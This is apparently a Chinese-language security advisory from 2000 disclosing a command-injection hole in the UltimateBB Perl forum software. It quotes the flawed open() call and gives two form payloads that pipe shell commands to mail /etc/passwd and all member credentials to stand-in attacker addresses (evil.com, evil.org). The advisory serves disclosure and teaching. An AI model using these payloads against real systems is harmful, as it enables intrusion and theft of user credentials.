发布日期：2000-02-14
更新日期：2000-02-15

受影响系统：

UltimateBB

描述：

---

来源：Sergei A. Golubchik <serg@INFOMAG.APE.RELARN.RU>

    UltimateBB是基于Perl的在线BBS系统。该BBS被发现存在安全漏洞，允许远程攻击者获取该Perl脚本能访问的任何文件，如/et/cpasswd，UltimateBBS的用户名/口令等。



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

    UltimateBB中有如下代码：
    
    # ubb_library.pl:901-902
          if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
          open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");

    因此只要提交如下表单：
    
    topic='012345.ubb|mail hacker@evil.com </etc/passwd|'

    就能获得/etc/passwd文件。而如下表单：

    topic='012345.ubb|cat Members/*|mail hacker@evil.org|'

    会显示该BBS的所有用户名和明文口令。



建议：

---

    暂无。



浏览次数：6781
严重程度：0（网友投票）